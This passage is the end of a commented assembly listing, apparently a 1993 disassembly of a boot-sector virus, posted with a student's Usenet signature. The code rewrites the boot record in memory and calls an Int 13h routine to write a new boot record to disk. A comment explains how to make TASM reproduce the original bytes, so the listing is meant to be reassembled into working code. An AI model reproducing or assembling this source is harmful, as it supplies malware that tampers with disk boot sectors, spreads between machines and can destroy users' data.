  634.         JB      HD_Exit                 ;002E1  72BB    |On error exit
  635.         MOV     DS:[0057h],CX           ;002E3  890E5700|DS:[57]=11 (Changed)
  636.         MOV     Word Ptr ES:[BX],1CEBh  ;002E7  26C707  |[0000:7C00] now holds
  637.                                         ;       EB1C    | EB 1C.
  638.         MOV     SI,001Eh                ;002EC  BE1E00  |SI=001E
  639.         ;-------------------------------;---------------------------------
  640.         ;LEA     DI,[BX+001Eh]          ;               |TASM will emit 8D7F1E
  641.                                         ;               |for this instruction,
  642.         DB      8Dh,0BFh,1Eh,00h        ;002EF  8DBF1E00|so assemble as DB's
  643.                                         ;               |BX=7C00 SI=001E
  644.                                         ;               |ES=0000 DI=7C1E
  645.         ;-------------------------------;---------------------------------
  646.         MOV     CX,01E0h                ;002F3  B9E001  |cx=01E0h si=001Eh
  647.         REP     MOVSB                   ;002F6  F3A4    |Move DS:SI to ES:DI
  648.                                         ;               |Restore boot record
  649.                                         ;               | from ofs 7C00:001E
  650.                                         ;               | Note initial jump
  651.                                         ;               | restored to EB 1C.
  652.         POP     CX                      ;002F8  59      |CX=number of sectors
  653.         CALL    Setup_Int13             ;002F9  E8E7FE  |Write the new boot
  654.                                         ;               | record.
  655.         JMP     Short Read_New_Boot     ;002FC  EB83    |Read it and process.
  656. ;---------------------------------------;---------------------------------
  657. Boot_ID DW      0AA55h                  ;002FE  55AA    |All valid boot
  658.                                         ;               | sectors end with
  659.                                         ;               | 55AA
  660.         ENDS                            ;---------------------------------
  661.                                         ; Disassembly by Arthur Ellis and ??
  662.         END     Boot_Start              ; [Suggestions by Lucifer Messiah]
  663.                                         ; April, 1993
  664. ;-------------------------------------------------------------------------
  665.  
  666.  
  667.  
  668. --
  669. Eric "Mad Dog" Kilby                                 maddog@ccs.neu.edu
  670. The Great Sporkeus Maximus                 ekilby@lynx.dac.neu.edu
  671. Student at the Northeatstern University College of Computer Science 
  672. "I Can't Believe It's Not Butter"
  673.  
  674.